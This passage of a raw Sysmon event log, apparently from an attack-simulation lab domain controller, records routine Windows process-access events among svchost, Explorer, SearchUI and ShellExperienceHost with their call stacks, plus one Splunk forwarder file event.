TEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001049928Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:05.851{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-F524-60EB-4C7D-00000000CF01}7300C:\Windows\system32\backgroundTaskHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001049927Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:05.851{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001049926Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:05.851{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001049925Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:05.851{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001049924Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:05.851{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+739b|C:\Windows\SYSTEM32\psmserviceexthost.dll+ae34|C:\Windows\SYSTEM32\psmserviceexthost.dll+7bae|C:\Windows\SYSTEM32\psmserviceexthost.dll+12141|C:\Windows\SYSTEM32\psmserviceexthost.dll+170e8|C:\Windows\SYSTEM32\resourcepolicyserver.dll+12326|C:\Windows\SYSTEM32\resourcepolicyserver.dll+bac5|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049923Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:05.851{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-F524-60EB-4C7D-00000000CF01}7300C:\Windows\system32\backgroundTaskHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001049922Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:05.851{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001049921Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:05.851{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001049920Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:05.836{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001049919Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:05.836{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001049918Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:05.836{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d2c9|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049917Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:05.836{466BC892-32D3-60E8-770B-00000000CF01}63564228C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109146|C:\Windows\System32\TwinUI.dll+82a97|C:\Windows\System32\TwinUI.dll+beade|C:\Windows\System32\TwinUI.dll+beaa9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049916Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:05.836{466BC892-32D3-60E8-770B-00000000CF01}63564228C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109146|C:\Windows\System32\TwinUI.dll+82a97|C:\Windows\System32\TwinUI.dll+beade|C:\Windows\System32\TwinUI.dll+beaa9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001049915Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:05.436{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7C178A87BC1535DB8272242343E2EC95,SHA256=28F8EAAE1B0EAEF3D8738C0A28F33407F96F4C23FA90C5CA3A17E34D6E5338CB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001049964Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:06.675{466BC892-32D3-60E8-770B-00000000CF01}63567232C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba2b0|C:\Windows\System32\TwinUI.dll+ba627|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x80000000000000001049963Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:06.675{466BC892-32D3-60E8-770B-00000000CF01}63567232C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba2b0|C:\Windows\System32\TwinUI.dll+ba627|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x80000000000000001049962Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:06.653{466BC892-02AF-60E8-0C00-00000000CF01}84410140C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+739b|C:\Windows\SYSTEM32\psmserviceexthost.dll+ae34|C:\Windows\SYSTEM32\psmserviceexthost.dll+7bae|C:\Windows\SYSTEM32\psmserviceexthost.dll+12141|C:\Windows\SYSTEM32\psmserviceexthost.dll+170e8|C:\Windows\SYSTEM32\resourcepolicyserver.dll+12326|C:\Windows\SYSTEM32\resourcepolicyserver.dll+bac5|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049961Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:06.653{466BC892-32D3-60E8-770B-00000000CF01}635610232C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109146|C:\Windows\System32\TwinUI.dll+82a97|C:\Windows\System32\TwinUI.dll+beade|C:\Windows\System32\TwinUI.dll+beaa9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049960Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:06.653{466BC892-32D3-60E8-770B-00000000CF01}635610232C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109146|C:\Windows\System32\TwinUI.dll+82a97|C:\Windows\System32\TwinUI.dll+beade|C:\Windows\System32\TwinUI.dll+beaa9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049959Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:06.653{466BC892-02AF-60E8-0C00-00000000CF01}84410140C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+739b|C:\Windows\SYSTEM32\psmserviceexthost.dll+ae34|C:\Windows\SYSTEM32\psmserviceexthost.dll+7bae|C:\Windows\SYSTEM32\psmserviceexthost.dll+12141|C:\Windows\SYSTEM32\psmserviceexthost.dll+170e8|C:\Windows\SYSTEM32\resourcepolicyserver.dll+12326|C:\Windows\SYSTEM32\resourcepolicyserver.dll+bac5|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049958Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:06.653{466BC892-32D3-60E8-770B-00000000CF01}63567412C:\Windows\Explorer.EXE{466BC892-F4EE-60EB-437D-00000000CF01}5240C:\Program 